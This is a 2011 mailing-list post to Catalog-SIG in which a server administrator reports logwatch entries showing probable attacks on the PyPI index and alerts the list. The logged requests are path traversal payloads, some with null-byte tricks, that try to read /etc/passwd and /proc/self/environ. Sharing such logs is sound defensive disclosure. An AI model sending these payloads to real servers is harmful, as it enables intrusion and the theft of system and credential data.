[Catalog-sig] Attempts to hack pypi?

Chris Withers chris at simplistix.co.uk
Fri Dec 2 19:30:07 CET 2011 

Hi All,

I got these from a logwatch warning on my server:

 
/pypi?:action=/../../../../../../../../../../etc/passwd%00&digest=517d7c7014d2b581f321d500eed4305e 
HTTP Response 302
     /pypi?%3Aaction=../../../../../../../../../../etc/passwd HTTP 
Response 302
     /pypi?%3Aaction=../../../../../../../../../../proc/self/environ 
HTTP Response 302
     /pypi?%3Aaction=../../../../../../../../../../etc/passwd%00 HTTP 
Response 302
 
/pypi?:action=../../../../../../../../../../proc/self/environ&provider=myOpenID 
HTTP Response 302
 
/pypi?:action=show_md5&digest=/../../../../../../../../../../proc/self/environ%00 
HTTP Response 302
 
/pypi?:action=show_md5&digest=../../../../../../../../../../proc/self/environ 
HTTP Response 302
 
/pypi?:action=../../../../../../../../../../etc/passwd%00&digest=517d7c7014d2b581f321d500eed4305e 
HTTP Response 302
     /pypi?%3Aaction=/../../../../../../../../../../etc/passwd%00 HTTP 
Response 302
 
/pypi?:action=../../../../../../../../../../proc/self/environ&digest=517d7c7014d2b581f321d500eed4305e 
HTTP Response 302
 
/pypi?:action=../../../../../../../../../../etc/passwd&provider=myOpenID 
HTTP Response 302
 
/pypi?:action=/../../../../../../../../../../etc/passwd&provider=myOpenID HTTP 
Response 302
     /pypi?%3Aaction=/../../../../../../../../../../proc/self/environ%00 
HTTP Response 302
     /pypi?%3Aaction=/../../../../../../../../../../etc/passwd HTTP 
Response 302
 
/pypi?:action=../../../../../../../../../../etc/passwd&digest=517d7c7014d2b581f321d500eed4305e 
HTTP Response 302
 
/pypi?:action=/../../../../../../../../../../etc/passwd&digest=517d7c7014d2b581f321d500eed4305e 
HTTP Response 302
     /pypi?:action=show_md5&digest=/etc/passwd HTTP Response 302
 
/pypi?:action=/../../../../../../../../../../proc/self/environ%00&provider=myOpenID 
HTTP Response 302
 
/pypi?:action=../../../../../../../../../../etc/passwd%00&provider=myOpenID 
HTTP Response 302
     /pypi?%3Aaction=/etc/passwd HTTP Response 302
 
/pypi?:action=/../../../../../../../../../../proc/self/environ%00&digest=517d7c7014d2b581f321d500eed4305e 
HTTP Response 302

...which looks a lot like someone trying to hack information from the 
PyPI server, so thought I'd let you know...

cheers,

Chris

More information about the Catalog-SIG mailing list